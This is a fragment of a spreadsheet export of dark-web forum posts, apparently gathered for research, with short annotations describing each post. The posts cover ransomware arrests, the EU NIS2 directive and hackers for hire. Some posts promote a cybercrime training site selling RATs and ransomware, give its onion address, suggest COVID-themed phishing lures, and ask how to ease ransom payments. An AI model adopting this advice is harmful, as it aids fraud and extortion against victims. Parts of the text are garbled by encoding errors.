    <t>0 days 00:53:00</t>
  </si>
  <si>
    <t>you can always buy a burner laptop to download or just open it in a vm.</t>
  </si>
  <si>
    <t>/u/Wireshaq</t>
  </si>
  <si>
    <t>0 days 03:21:00</t>
  </si>
  <si>
    <t>hacktown is not a scam. it's my retirement project to keep my idle hands busy :);;it's a place i created for people to learn from my experience when i was operating as a cybercriminal so others can re-create what i did and profit just like i did. it's not a hacking course per se but will teach you specific cybercriminal skills to apply in the real world which include some hacking skills and online fraud.;;people will tell you that you can learn this knowledge anywhere. this is not as easy as it seems and you'll spend an absurd amount of time trying to do so. people will tell you just phish their credentials, infect them with malware, etc. but no one will tell you step by step to pull it all off. this is where you'll learn everything and be able to apply it in the real world.;;membership only includes access to hacktown (courses and forum) but the membership fees are used towards testing new malware so people can purhcase specific malware (ransomware, rat, etc.) with confidence, cc resources, server costs, reimbursing members if they run into trouble, and many other perks.;;i've heard so many success stories of others profiting and getting their cybercriminal operations off the floor which brings me joy which was my whole goal of creating it. random i know but true.;;if you enjoyed the free content you'll enjoy what hacktown has to offer.</t>
  </si>
  <si>
    <t>2 days 01:37:00</t>
  </si>
  <si>
    <t>this reminded me of a story that broke a little while ago. this hacker group called darkside decided they would donate around $20k to charities and it just backfired (mainly because they publicised it). someone said they were just paying off their "moral guilt", and the whole story was just over shadowed by people scolding them.;;but no charity wanted the money, they all had agreements that say "any money suspected donated from the procedes of illegal activity will be declined".;;;https://www.techworm.net/2020/10/robin-hood-hacker-donate-money-charities.html;;my point being, if it's 'dirty' money charities don't want it, don't give it to them. i wouldn't put them through the pain of possibly having to correspond heavily with law enforcement and deal with some bullshit they were never a part of.;;if you want to donate somewhere donate here /page/donate/;;;)</t>
  </si>
  <si>
    <t>User discussing darkside donating money gained from ransomware bounties to charity, user disagrees with this occuring</t>
  </si>
  <si>
    <t>/u/jeffreyepstein</t>
  </si>
  <si>
    <t>13/12/2020 03:06</t>
  </si>
  <si>
    <t>778d191b763eb066d2fb</t>
  </si>
  <si>
    <t>Donating to charity with dirty coins</t>
  </si>
  <si>
    <t>0 days 03:01:00</t>
  </si>
  <si>
    <t>2 days 06:16:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the covid-19 pandemic has shown us two sides of technological progress. there���s the positive side that���s delivered safe and effective vaccines in record time, helped economies with new stay-at-home online tools and improved disease surveillance and public health.;;;source:;the japan times;;and there���s the negative side that���s turbocharged malicious actors��� and authoritarian regimes��� disinformation campaigns, hacking and disruption of opponents, and fostered a rise in public harms like ransomware attacks and fraud. it���s this grim reality that the west must tackle as economies reopen, and the g7 summit next month is a perfect time to do it.;;cyber threats have been warned about over the past year, but the scale and reach of the problem are hitting new heights. the u.s. and europe have accused china and russia of stepping up information warfare ��� from covid-19 conspiracy theories to misleading information about vachile further restricting their citizens��� liberties at home.;;freedom house, which last year found 75% of the world���s population lived in a country experiencing democratic decline, says the pandemic has cast a ���digital shadow.��� there���s no easy fix. russia, for example, has left countries like the u.k. fuming as it fails to go after cybercriminals on its turf.;;moscow and beijing���s push for digital ���sovereignty��� has emboldened authoritarian regimes, as seen in belarus���s shocking forced landing of a ryanair flight last week. the roots of this crisis, which has opened a new rift between the west and strongman alexander lukashenko, who enjoys vladimir putin���s backing, lie in information warfare. lukashenko���s ostensible target was 26-year-old raman pratasevich, an exiled journalist and former editor of opposition media nexta, which operates through encrypted messaging app telegram.;;there���s a pattern of escalation. last ians and accused them of planning an uprising, minsk said it had foiled a ���coup��� discussed on video-conferencing app zoom. belarus authorities have blocked websites and restricted internet access since lukashenko���s widely contested re-election in august (deemed by the eu to be neither free nor fair), and his kremlin backers have lent their support.;;the ���skyjacking��� sends the message that minsk���s online critics aren���t safe anywhere, even in exile. it fits neatly with lukashenko���s persistent siege mentality as he whips up the threat of ���hybrid��� online-offline warfare supposedly being waged by the west.;;crafting a strategy will require going beyond past language advocating ���internet freedom.��� the drama around belarus deserves its own response beyond necessary sanctions, and the eu and u.s. should aim for more solidarity with belarusian civil society (and journalists-in-exile similar to pratasevich) with more fundingia need support to respond to continuous fines, to counter disinformation and launch alternative websites. as tadeusz giczan, nexta���s current editor-in-chief, told the new statesman, attempts to raise money via grants have been unsuccessful in the past, leading to financial difficulties.;;more resources to improve digital literacy would also help: journalist hanna liubakova says independent media will benefit from more tools to combat censorship, whether via virtual private networks, mirroring websites ��� a way of replicating content via a different server and domain name to circumvent blocking ��� or other tools.;;the west should also mount a broader effort to undermine malicious online actors while helping virtuous ones. this means taking better care to ensure surveillance technology isn���t exported to repressive regimes.;;lukashenko���s government blocked much of the internet during protests last summer with the help of technology from u.s.-based sandvine inc. the company ith belarus, but only after bloomberg news reported on it. sandvine���s tools had been used to censor the internet in more than a dozen countries in recent years.;;the g7 should also name and shame suspected cybercriminals and threaten retaliation for countries that persistently refuse to punish them. it should pour more resources into policing anonymous darknet markets where crime-as-a-service and covid-19 scam merchants prosper, enabled by pseudonymous cryptocurrencies.;;this won���t be an all-or-nothing pitched battle between privacy and security. the u.s. and europe are reluctant to simply let the market decide where consumer eyeballs and data go.;;one of the best-known anti-censorship tools, the tor anonymity network, has an obvious dual use: it houses both criminal marketplaces and licit activity wanting to escape prying eyes. funded historically by u.s. government agencies, putin in 2014 offered more than $100,000 for a way to de-anonymize it to get at political dissidents. he was rebuffed.y virginia tech���s eric jardine has shown how the benefits of tor are clustered disproportionately in countries deemed not free or partially free, while its harms cluster in democracies. if liberal democracies don���t craft a coherent strategy that benefits good actors while harming bad ones, the pandemic���s digital shadow w</t>
  </si>
  <si>
    <t>Post describing how the covid-19 pandemic, whilst positive due to medical advancement has provided a rise and incentive in ransomware attacks along with other cybercrime</t>
  </si>
  <si>
    <t>13d8f3c353b1712aa8f9</t>
  </si>
  <si>
    <t>Don���t Let Autocrats Run the Internet After CO</t>
  </si>
  <si>
    <t>so in ransomware attacks or data leaks, hackers usually require their targets to pay the ransom in bitcoin. the problem is that most people have never bought bitcoin before so its a real challenge. plus signing up for exchanges like coinbase can take a long time because of kyc and all the verifications.;;so my question is this... whats an easy way for a victim to buy cryptocurrency? i think more ransoms would be paid if it was easy for the victim to buy bitcoin. i know some groups even include little guides on how to download the tor browser and stuff but i feel like the success rate would be better if the victims were actually taught how to buy coins from non-kyc exchanges. if the hackers aren't in control of very very valuable data saying "let the victim figure it out" seems like a lot of $$$ left on the table;;thoughts?</t>
  </si>
  <si>
    <t>Post requesting information on easy ways to buy cryptocurrency, in order to increase profits by making it easier for victims to pay ransomware payments</t>
  </si>
  <si>
    <t>/u/Zippler</t>
  </si>
  <si>
    <t>23/04/2020 12:44</t>
  </si>
  <si>
    <t>09327cb75d2ae9e8c223</t>
  </si>
  <si>
    <t>Easy ways for victims to buy bitcoin or other cryptocurrency</t>
  </si>
  <si>
    <t>0 days 01:47:00</t>
  </si>
  <si>
    <t>an estonian man was sentenced today to more than five years in a u.s. prison for his role in at least 13 ransomware attacks that caused losses of approximately $53 million. prosecutors say the accused also enjoyed a lengthy career of ���cashing out��� access to hacked bank accounts worldwide.;;;https://krebsonsecurity.com/2022/03/estonian-tied-to-13-ransomware-attacks-gets-66-month</t>
  </si>
  <si>
    <t>News post regarding an estonian man sentenced for his role in ransomware attacks</t>
  </si>
  <si>
    <t>/u/epiceliteyt</t>
  </si>
  <si>
    <t>30/03/2022 20:43</t>
  </si>
  <si>
    <t>/d/Fraud101</t>
  </si>
  <si>
    <t>d16469e3f36114549a8c</t>
  </si>
  <si>
    <t>Estonian Tied to 13 Ransomware Attacks Gets 66 Months in Prison</t>
  </si>
  <si>
    <t>0 days 11:42:00</t>
  </si>
  <si>
    <t>;;estonian tied to 13 ransomware attacks gets 66 months in prison;;by;/u/epiceliteyt;���;7 months ago;in;/d/fraud101;;6 points;���;</t>
  </si>
  <si>
    <t>aa29ab9ed44f9f5a30e2</t>
  </si>
  <si>
    <t>2e1096aaf8a027490a45</t>
  </si>
  <si>
    <t>i think he is lucky  to get only 66 months for the damage he made, even if was just role not the entire operation, when you caused that amount in losses for businesses as a result of his attacks, i mean 53 million...i think he got lucky with the sentence.</t>
  </si>
  <si>
    <t>User stating he was lucky to get the sentence he did due to his impact</t>
  </si>
  <si>
    <t>/u/merlin</t>
  </si>
  <si>
    <t>31/03/2022 08:25</t>
  </si>
  <si>
    <t>���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;;(there is not much disclosed to the public arena yet on this matter. it mirrors the cloud acts, if anything, and shows similarity in the same allegiance between the us-uk-au and now the eu.);;;"the directive will formally establish the european cyber crises liaison organization network, eu-cyclone, which will support the coordinated management of large-scale cybersecurity incidents," the council of the european union said in a statement last week.;;the development closely follows the european commission's plans to "detect, report, block, and remove" child sexual abuse images and videos from online service providers, including messaging apps, prompting concerns that it may undermine end-to-end encryption (e2ee) protections.;;the draft version of nis2 explicitly spells out that the use of e2ee "should be reconciled with the member states' powers to ensure the protection of their essential security interests and public security, and to permit the investigation, detection and prosecution of criminal offenses in compliance with union law.";;it also stressed that "solutions for lawful access to information in end-to-end encrypted communications should maintain the effectiveness of encryption in protecting privacy and security of communications, while providing an effective response to crime.";;;the eu commission's proposal;;in addition, the nis 2 directive, among other things:;;;one of the most significant changes proposed by the nis 2 directive is the definition of a new scope of application. in fact, where the nis directive included in its scope of application operators of essential services and digital services providers, the nis 2 directive proposes to replace the same with two new categories of entities. specifically, article 2 of the commission's proposal would establish that the nis 2 directive applies to certain public and private 'essential entities' operating in the sectors listed annex i of the nis 2 directive (energy, transport, banking, financial market infrastructures, health, drinking water, waste water, digital infrastructure, public administration, and space) and to certain 'important entities' operating in the sectors listed annex ii of the nis 2 directive (postal and courier services, waste management, manufacture, productions, and distribution of chemicals, food production, processing, and distribution, manufacturing, and digital providers). in addition, a size-cap rule is introduced, according to which all medium and large entities, as defined by commission recommendation 2003/361/ec of 6 may 2003 concerning the definition of micro, small and medium-sized enterprises, operating in the above-mentioned sectors, would automatically fall within the nis 2 directive's scope of application (recital 8 of the nis 2 directive).;;;;��� it requires member states to adopt a national cybersecurity strategy (articles 5-11 of the nis 2 directive);;;��� enhances cooperation among member states, by facilitating strategic cooperation and exchange of information (articles 12 to 16 of the nis 2 directive);;;��� strengthens the security requirements, by obliging member states to impose cybersecurity obligations on all covered entities, and streamlines reporting obligations (article 17 to 23 of the nis 2 directive);;;��� facilitates information sharing among covered entities (arnis 2 directive); and;;��� it creates stricter supervisory measures, enforcement requirements, and harmonised minimum sanctions (articles 28 to 34 of the nis 2 directive).;;;;some side dishes;;;as part of the announcement, the european commission also reiterated its pledge to other regulatory initiatives in the area of cybersecurity, including with respect to 5g security, the eu���s autonomous cyber sanctions regime and an ���internet of secure things���.;;;5g security;;;in january 2020, the european commission endorsed the eu 5g toolbox that sets out the measures agreed by eu member states to address security risks in 5g telecommunication networks and, in particular, the exposure to high-risk suppliers. the european commission now published another update report on the implementation of the eu 5g toolbox (see here) and urges eu member states to complete, by q2 2021, the legislative processes to introduce specific security restrictions currently underway at the national levels.;;;eu cy and again in october of this year, the eu imposed financial and travel restrictions on russian, chinese and north-korean individuals and entities for their alleged involvement in a number of widely-publicised cyberattacks including the ���wannacry��� and ���notpetya��� ransomware attacks, the us $81 million bangladesh bank cyber heist and the 2015 bundestag hack. significantly, these sanctions prohibit any eu business from making funds or economic resources available, either directly or indirectly, to or for the benefit of those listed, including when that business falls victim to a cyberattack and is extorted into paying a ransom to have their systems decrypted (earlier post here). the european commission now seeks to bolster this sanctions regime, and announces a proposal for the council to decide on future listings by qualified majority rather than unanimity.;;;iot;;;[finally, the european commission stresses the on-going work in the development of a european cybersecurity certificet of things (iot) devices, and says it is considering new horizontal regulation for the cybersecurity of connected products and associated services offered in the european market. this horizontal regulation could include a new duty of care for connected device manufacturers to address software vulnerabilities (including the continuation of software and security updates) and an obligation to delete personal and other sensitive data at the iot device���s end of life.;;;next steps;;;the european commission���s proposals will now need to go through the legislative process, and be discussed by ��� and agreed between ��� the european parliament and the eu member states via the council. whilst it may take a number of years for the rules to be adopted, implemented and become enforceable, the proposals put forward by the european commission clearly set the tone for what is about to come.;;;council and eu parliament reach an agreement on the nis 2 directive;;;on 13 may 2022, the council and theeed on the directive on measures for a high common level of cybersecurity across the union (nis 2 directive), which adapts the previous nis directive to current needs.;;;the provisional agreement responds to europe's increased exposure to cyber threats by improving the resilience and incident response capacities of the public and private sectors and the european union as a whole. the new rules cover a wider scope compared to the previous directive and force more entities to take cybersecurity risk management measures.;;;in particular, the nis 2 directive will strengthen cybersecurity requirements, introduce more stringent supervisory measures for national authorities, harmonise sanctions regimes across the member states, and improve information sharing and cooperation on cyber crisis management across europe.;;;before entering into force, the agreement has to be approved by the european parliament and the council.;;;______________________________________________________________;;https://thehackernews.com/2022/05/europe-agrees-to-adopt-new-nis2.html;;https://www.dataguidance.com/opinion/eu-towards-adoption-nis-2-directive;;https://www.allenovery.com/en-gb/global/news-and-insights/publications/new-eu-cybersecurity-strategy-european-commission-accelerates-push-for-eu-to-lead-in-cybersecurity-regulation;;https://www.consilium.europa.eu/en/press/press-releases/2021/12/03/strengthening-eu-wide-cybersecurity-and-resilience-council-agrees-its-position/�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������2�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������</t>
  </si>
  <si>
    <t>Europe Agrees to Adopt New NIS2 Directive Aimed at Hardening Cybersecurity - warning dread users of the changes</t>
  </si>
  <si>
    <t>16/05/2022 20:56</t>
  </si>
  <si>
    <t>3bbc53db7ec1b933cdb7</t>
  </si>
  <si>
    <t>Europe Agrees to Adopt New NIS2 Directive Aimed at Hardening Cybersecurity</t>
  </si>
  <si>
    <t>1 days 23:48:00</t>
  </si>
  <si>
    <t>interesting, just closer ties, faster investigations, pooling of resources even.  thanks for the headsup</t>
  </si>
  <si>
    <t>user thanking u/HeadJanitor for important information</t>
  </si>
  <si>
    <t>/u/phishermansfreind</t>
  </si>
  <si>
    <t>16/05/2022 21:16</t>
  </si>
  <si>
    <t>0 days 00:20:00</t>
  </si>
  <si>
    <t>we're always on the look out --- thank you!</t>
  </si>
  <si>
    <t>16/05/2022 21:18</t>
  </si>
  <si>
    <t>good man, thanks for the update.</t>
  </si>
  <si>
    <t>/u/dumbassusername</t>
  </si>
  <si>
    <t>16/05/2022 21:40</t>
  </si>
  <si>
    <t>0 days 00:22:00</t>
  </si>
  <si>
    <t>gotta stay one step ahead --- this last year, all they've been doing is closing in on us. it's just not our time right now.</t>
  </si>
  <si>
    <t>u/HeadJanitor accepting praise</t>
  </si>
  <si>
    <t>16/05/2022 21:51</t>
  </si>
  <si>
    <t>dear;/u/papinian3;,;;it's nothing but mafia tactics. in 2018, the english-speaking countries realized how vast the darknet was and that cybersecurity was going to be a bigger threat than they imagined. so, they came to an agreement to collectively share together any information they had in any one of their respective countries regarding anything from 'crypto' to 'darknet' to 'cp' to 'ransomware' to 'data breaches and leaks' ... having to do with defending;their;cyberspace. it's the massive "cloud act" of the english-speaking world, working in collaboration and they are picking up strength and momentum rapidly, motivated by high yield coin and guaranteed victories. look at what has been done to the marketplace in just a few months.</t>
  </si>
  <si>
    <t>u/HeadJanitor expressing his opinion on the tactics english speaking countries are implimenting to stop ransomware attacks</t>
  </si>
  <si>
    <t>18/05/2022 20:02</t>
  </si>
  <si>
    <t>0 days 17:42:00</t>
  </si>
  <si>
    <t>according to the law enforcement report, the actors have deployed ransomware strains such as lockergoga, megacortex, and dharma, as well as malware like trickbot and post-exploitation tools like cobalt strike. lockergoga first appeared in the wild in january 2019, when it hit ���altran technologies���, a french engineering and r&amp;d consultant, part of the capgemini group. lockergoga and megacortex infections culminated���;;;;read more;;http://dark.camp/2021/10/30/europol-has-announced-the-arrest-of-12-individuals-believed-to-be-linked-to-ransomware-attacks-against-1800-victim</t>
  </si>
  <si>
    <t>news post describg europol arresting individuals related to various ransomware/malware strains</t>
  </si>
  <si>
    <t>/u/DarkDotCamp</t>
  </si>
  <si>
    <t>30/10/2021 18:41</t>
  </si>
  <si>
    <t>/d/DarkDotCamp</t>
  </si>
  <si>
    <t>5f8fa77cf2d4236247a2</t>
  </si>
  <si>
    <t>Europol has announced the arrest of 12 individuals believed to be linked to ransomware attacks against 1,800 victims in 71 countries.</t>
  </si>
  <si>
    <t>i say good riddance. ransomwear operators are scum and target the most vulnerable people, such as non-technically savvy people, the elderly, and small businesses that don't have the resources to deal with this.;;i don't mind when they go after major corporations. i would love to see them go after the msm in america, federal gov sites, major fortune 500 companies like the car, airplane and banking cartels.;;i actually added;zone alarm anti-ransomwear;to my father's business pc, along with running with;webroot secure anywhere (which is having a 67% off sale, btw);, along with;malwarebytes;.;;zone alarm anti-ransomwear backs up all the important files on your pc, then creates honeypots all over the hdd in different folders. none of these files in these folders should be accessed under any circumstance, so if it detects one has been edited, it automatically kills all tasks and prevents the ransomwear from spreading. it also includes an anti-phishing feature for your web browser which i find unnecessary and annoying.</t>
  </si>
  <si>
    <t>user stating they disagree with ransomware and dislike those who participate in ransomware</t>
  </si>
  <si>
    <t>30/10/2021 18:57</t>
  </si>
  <si>
    <t>we conducted an interview with the admin of hacktown and learnt why it has become the go-to website for anyone looking to launch their career in cybercrime.;;the tape news team interviewed the admin of hacktown in an exclusive conversation that will provide a clear picture of what the dark web platform is all about.;;one thing that readers should acknowledge is the success an experience that the platform has enjoyed as evidenced by the fact that the hacktown was established in the year 2019 and has since boasted the ability of staying clear of the common issues facing peer websites apart from, the occasional ddos attacks.;overall, hacktown has achieved the status of the dark web's most notable "cybercriminal university" whose purpose is to allow users to achieve the once-inaccessible knowledge and skills in order to gain from the highly lucrative dark web cybercrime industry.;in the following interview, we managed to get a sense of why hacktown was established as a go-to website where anyone can learn how they can gain their footing into the dark web's cybercrime industry.;we also quizzed the admin about his high-level thoughts about the overall status of the global cybercrime industry as affected by the covid-19 pandemic and the ongoing russia-ukraine conflict.;;here were his responses:;tape news:;what is hacktown and who do you serve?;;hacktown admin: hacktown is designed to teach people about cybercrime and how to effectively become a successful cybercriminal in 2022. think university/college courses and this is what hacktown aims to strive to be. i was a successful cybercriminal who retired many years ago. out of boredom and making a new project for myself i've decided to teach and show people how to become a cybercriminal based on my experience and knowledge. there are courses offered based on specific topics for people to take and learn from. it'll teach you the basics and build upon that eventually arming you with the latest tactics, techniques, and procedures seen from other major cybercriminal gangs so people can implement them into their lives.;;tape news:;can you give a range of how much money an aspiring user will need to spend to access hacktown services;hacktown admin: what you need to do is purchase membership that currently stands at $250 usd. membership fees are used to purchase, test, and audit products listed at hacktown for others to purchase. we make sure that the products listed do work as intended which will take the guess work out of figuring out what works so people can purchase their cyber weapons with confidence.;of course, the products listed in hacktown will have to be purchased by members seperately and these can range from a few hundred to a few thousand dollars depending on what's required. good ransomware can and will cost upwards of $1000/month.;;tape news:;what is hacktown���s best-selling product/service?;hacktown admin: i do not keep track of which product is highly used but i do enjoy receiving members stories on their success and it seems to be a toss up between remcos, warzone, and what used to be a ransomware product for sale there before the member was arrested.;;tape news:;what inspired you to form hacktown?;hacktown admin: idle hands are never a good thing. i cashed out my cybercriminals adventures some moons ago and was coasting through life. like anything we can coast for so long so i decided to create hacktown for others to learn proper information regarding cybercrime. there was lots of information out there about cybercrime but not specific information on how to pull of most online crimes. hacktown is designed around my experience and success as a cybercriminal and will teach others how to succeed just like i did course by course.;;tape news:;what���s your background and does it have an effect on hacktown���s services?;hacktown admin: no different than anyone else. i grew up around computers and was always interested in them"bad way". i went down the "hacker" route but really was just a skid with a little bit of programming knowledge to advance and hone my skills. i went down the "cyber security" career path but soon realized how toxic that was and switched gears. i started to get into carding online and eventually branched out into the blackhat world never really looking back. once i got into the ransomware scene i went full tilt until i cashed everything out. i've hand my hands in online carding, scams, infecting people with rats, and ransomware for the sole purpose of profiting.;;the reality is that useful information is scattered across the interwebs with scammers lurking in the shaodws so it's difficult for others entering the cybercriminal scene to find realiable updated information. hacktown aims to bridged that gap and provides everything you'll need to know about cybercrime(withn my wheelhouse) and provides docimentation, other textbooks, information, products, and everything an aspiring cybercriminal will need to be successful.;;tape news:;covid-19 &amp; the russia-ukraine war has influenced global cybercrime.what are some of the new opportunities/realities you can identify?;;hacktown admin: covid-19 has fucked my world. i've been struggling since i lost a close family member to covid in the early beginnings of when it hit. back then was chaos and the world was more upside down than it is today which made it difficult for me losing my family member. however, like me there are many others like me out there with many stories to share.;that being said covid-19 has given an excellent phishing pre-text to work with when targeting an individual or business online. nothing better than sending an email about "updated covid-19 work place rules" to everyone in a company. it's given an ideal se hook to work with that's for sure.;;tape news: kindly make a comment on how you have influenced the dark web community beyond the products you sell to users (comment on both personal and hacktown capacities);;hacktown admin: i'm not sure if i've "influenced" anyone but what i do know is by providing factual and real information i've helped people achieve their goals regarding cybercrime or infecting xyz with malware. many people realize how difficult it is to get real information on a specific topic and can appreciate all the work being done at hacktown for them. i have helped numerous amounts of people along the way and continue to help guide people to the right resources, places, and products with confidence.;i think it's important for others to hear real stories from individuals who have already gone through what others are just about to experience. it's nice to hear stories, successes, and failure of others as this is how we all learn. learning from experienced individuals helps people get to where they have to go quicker than by googling the shit out of something on their own. i will continue to advance, enhance, and ensure hacktown remains on top of the latest attacks, techniques, and everything else surrounding cybercrime so people can stay up to date and receive updated information.;;tape news:;any partying shot to aspiring hacktown users?;;hacktown admin: if you've learned anything from the free courses offered at hacktown then this is the place for you. curious to which ransomware, rat, etc. to purchase but not sure if that product is what they say it is? let us do the lifting and testing so you don't have to. all the information, products, and resources in hacktown are as real as it gets. don't let time pass you by because cybersecurity is getting better and better each year.;;;how to find hacktown;;by now, you already know the importance of only using the authentic links to dark web platforms in order to avoid potential phishing sites that may try to mimic the real sites.;fortunately, we have listed the official tor link to hacktown below. happy browsing and be sure to check out a review that we have done about the hacktown site just to give you an         idea of what to expect when you decide to visit!;;link: http://hacktowns3sba2xavxecm23aoocvzciaxirh3vekg2ovzdjgjxedfvqd.onion/</t>
  </si>
  <si>
    <t>Interview with hacktown admin - included discussions on ransomware habits</t>
  </si>
  <si>
    <t>/u/Bronzo</t>
  </si>
  <si>
    <t>1814b6f063d84fe21b1e</t>
  </si>
  <si>
    <t>Exclusive Interview with HackTown Admin</t>
  </si>
  <si>
    <t>48 days 23:43:00</t>
  </si>
  <si>
    <t>we conducted an interview with the admin of hacktown and learnt why it has become the go-to website for anyone looking to launch their career in cybercrime;;the tape news team interviewed the admin of hacktown in an exclusive conversation that will provide a clear picture of what the dark web platform is all about.;one thing that readers should acknowledge is the success an experience that the platform has enjoyed as evidenced by the fact that the hacktown was established in the year 2019 and has since boasted the ability of staying clear of the common issues facing peer websites apart from, the occasional ddos attacks.;;overall, hacktown has achieved the status of the dark web's most notable "cybercriminal university" whose purpose is to allow users to achieve the once-inaccessible knowledge and skills in order to gain from the highly lucrative dark web cybercrime industry.;in the following interview, we managed to get a sense of why hacktown was established as a go-to website where anyone can learn how they can gain their footing into the dark web's cybercrime industry.;we also quizzed the admin about his high-level thoughts about the overall status of the global cybercrime industry as affected by the covid-19 pandemic and the ongoing russia-ukraine conflict.;here were his responses:;;tape news: what is hacktown and who do you serve?;;hacktown admin: hacktown is designed to teach people about cybercrime and how to effectively become a successful cybercriminal in 2022. think university/college courses and this is what hacktown aims to strive to be. i was a successful cybercriminal who retired many years ago. out of boredom and making a new project for myself i've decided to teach and show people how to become a cybercriminal based on my experience and knowledge. there are courses offered based on specific topics for people to take and learn from. it'll teach you the basics and build upon that eventually arming you with the latest tactics, techniques, and procedures seen from other major cybercriminal gangs so people can implement them into their lives.;;tape news: can you give a range of how much money an aspiring user will need to spend to access hacktown services;;hacktown admin: what you need to do is purchase membership that currently stands at $250 usd. membership fees are used to purchase, test, and audit products listed at hacktown for others to purchase. we make sure that the products listed do work as intended which will take the guess work out of figuring out what works so people can purchase their cyber weapons with confidence.;of course, the products listed in hacktown will have to be purchased by members seperately and these can range from a few hundred to a few thousand dollars depending on what's required. good ransomware can and will cost upwards of $1000/month.;;tape news: what is hacktown���s best-selling product/service?;;hacktown admin: i do not keep track of which product is highly used but i do enjoy receiving members stories on their success and it seems to be a toss up between remcos, warzone, and what used to be a ransomware product for sale there before the member was arrested.;;tape news: what inspired you to form hacktown?;;hacktown admin: idle hands are never a good thing. i cashed out my cybercriminals adventures some moons ago and was coasting through life. like anything we can coast for so long so i decided to create hacktown for others to learn proper information regarding cybercrime. there was lots of information out there about cybercrime but not specific information on how to pull of most online crimes. hacktown is designed around my experience and success as a cybercriminal and will teach others how to succeed just like i did course by course.;;tape news: what���s your background ae? does it have an effect on hacktown���s services?;;hacktown admin: no different than anyone else. i grew up around computers and was always interested in them"bad way". i went down the "hacker" route but really was just a skid with a little bit of programming knowledge to advance and hone my skills. i went down the "cyber security" career path but soon realized how toxic that was and switched gears. i started to get into carding online and eventually branched out into the blackhat world never really looking back. once i got into the ransomware scene i went full tilt until i cashed everything out. i've hand my hands in online carding, scams, infecting people with rats, and ransomware for the sole purpose of profiting.;;the reality is that useful information is scattered across the interwebs with scammers lurking in the shaodws so it's difficult for others entering the cybercriminal scene to find realiable updated information. hacktown aims to bridged that gap and provides everything you'll need to know about cybercrime(withn my wheelhouse) and provides docimentation, other textbooks, information, products, and everything an aspiring cybercriminal will need to be successful.;;tape news: covid-19 &amp; the russia-ukraine war has influenced global cybercrime.what are some of the new opportunities/realities you can identify?;;hacktown admin: covid-19 has fucked my world. i've been struggling since i lost a close family member to covid in the early beginnings of when it hit. back then was chaos and the world was more upside down than it is today which made it difficult for me losing my family member. however, like me there are many others like me out there with many stories to share.;that being said covid-19 has given an excellent phishing pre-text to work with when targeting an individual or business online. nothing better than sending an email about "updated covid-19 work place rules" to everyone in a company. it's given an ideal se hook to work with that's for sure.;;tape news: kindly make a comment on how you have influenced the dark web community beyond the products you sell to users (comment on both personal and hacktown capacities);;hacktown admin: i'm not sure if i've "influenced" anyone but what i do know is by providing factual and real information i've helped people achieve their goals regarding cybercrime or infecting xyz with malware. many people realize how difficult it is to get real information on a specific topic and can appreciate all the work being done at hacktown for them. i have helped numerous amounts of people along the way and continue to help guide people to the right resources, places, and products with confidence.;i think it's important for others to hear real stories from individuals who have already gone through what others are just about to experience. it's nice to hear stories, successes, and failure of others as this is how we all learn. learning from experienced individuals helps people get to where they have to go quicker than by googling the shit out of something on their own. i will continue to advance, enhance, and ensure hacktown remains on top of the latest attacks, techniques, and everything else surrounding cybercrime so people can stay up to date and receive updated information.;;tape news: any partying shot to aspiring hacktown users?;hacktown admin: if you've learned anything from the free courses offered at hacktown then this is the place for you. curious to which ransomware, rat, etc. to purchase but not sure if that product is what they say it is? let us do the lifting and testing so you don't have to. all the information, products, and resources in hacktown are as real as it gets. don't let time pass you by because cybersecurity is getting better and better each year.;;how to find hacktown;by now, you already know the importance of only using the authentic links to dark web 	platforms in order to avoid potential phishing sites that may try to mimic the real sites.;fortunately, we have listed the official tor link to hacktown below. happy browsing and be 	sure to check out a review that we have done about the hacktown site just to give you an 	idea of what to expect when you decide to visit!;link: http://hacktowns3sba2xavxecm23aoocvzciaxirh3vekg2ovzdjgjxedfvqd.onion/;;original - https://tape-news.net/exclusive-interview-with-hacktown-admin;original (onion) - http://tape6m4x7swc7lwx2n2wtyccu4lt2qyahgwinx563gqfzeedn5nb4gid.onion/exclusive-interview-with-hacktown-admin</t>
  </si>
  <si>
    <t>869b4124e2e0c32796a2</t>
  </si>
  <si>
    <t>before i start my own research, how accurate is the "hackers for hire" scene on the dark net. how should i go about making sure people are trustworthy? what are people able to do in terms of ransomware/malware/hacking? how much does it cost? how can i learn more about this? thanks for any help you can give me guys, and stay safe.;;;i've been on dns for a little while but only for buying drugs i've only heard stories about hackers on the dark web, i never explored the idea until today. thank you again.</t>
  </si>
  <si>
    <t>User asking for information regarding the validiaty of 'hackers for hire'</t>
  </si>
  <si>
    <t>/u/heroinb00fer</t>
  </si>
  <si>
    <t>/d/DarknetMarketsNoobs</t>
  </si>
  <si>
    <t>2325c0f8777c22dd75e1</t>
  </si>
  <si>
    <t>Expectations for DN "Hackers"</t>
  </si>
  <si>
    <t>0 days 23:05:00</t>
  </si>
  <si>
    <t>a good place to start is;/d/hacking;. maybe;/d/fraud;, too.</t>
  </si>
  <si>
    <t>user providing information on where to find appropreate information</t>
  </si>
  <si>
    <t>information / education (provider)</t>
  </si>
  <si>
    <t>be careful. a lot of scammers out there. dont pay for anything magical. hackers arent magic and unless we got a zero day (which we wouldnt be selling for $50 to some random skids.), we only have a limited amount of hacks to work with that only affect those with weaker security or less computing power than ourselves.</t>
  </si>
  <si>
    <t>user providing information on where to find appropreate information and warning against scammers</t>
  </si>
  <si>
    <t>/u/Afdfed1213</t>
  </si>
  <si>
    <t>most hack for hire is completely bogus.;you may be able to find cheap malware or keyloggers, maybe a bruteforce tool that you need a lot of cpu to use. but hacking isnt magic. people deticate their lives to hacking specific people or organizations. only general hacks are really useful and buyable.</t>
  </si>
  <si>
    <t>dread is not really useful...;exploit.in or xss.is instead;;/u/heroinb00fer</t>
  </si>
  <si>
    <t>User recommending they look at diffrent sites as dread isnt the best for this</t>
  </si>
  <si>
    <t>/u/Tyche</t>
  </si>
